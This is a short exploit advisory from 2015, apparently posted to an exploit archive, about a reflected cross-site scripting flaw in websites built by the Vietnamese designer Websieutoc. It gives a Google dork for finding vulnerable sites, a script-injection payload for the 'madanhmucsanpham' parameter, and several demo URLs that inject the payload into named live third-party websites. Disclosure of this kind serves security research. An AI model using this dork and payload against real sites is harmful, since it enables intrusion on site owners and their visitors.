######################
# Exploit Title : Design by Websieutoc Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://websieutoc.vn/
# Google Dork : intext:"Thiết kế web, Quảng cáo google bởi DMV"
# Date: 2015/12/28
#
######################
# PoC:
# http://www.maynangluongmattroi.info/?madanhmucsanpham=[XSS]
# Payload = "><script>alert("Mobham")</script>
#
# Demo:
#
#http://www.diennongthontv.com/?madanhmucsanpham=19%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://www.maynangluongmattroi.info/?madanhmucsanpham=3%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://dongtin.com.vn/?page=sanphamtheodanhmuc&madanhmucsanpham=1%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E
#
#http://www.hethongpccc.com/?page=sanpham&masp=316&madanhmucsp=47%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&mode=detail
#
#http://chixquang.com/?page=sanpham&masp=65&madanhmucsp=49%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&mode=detail
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################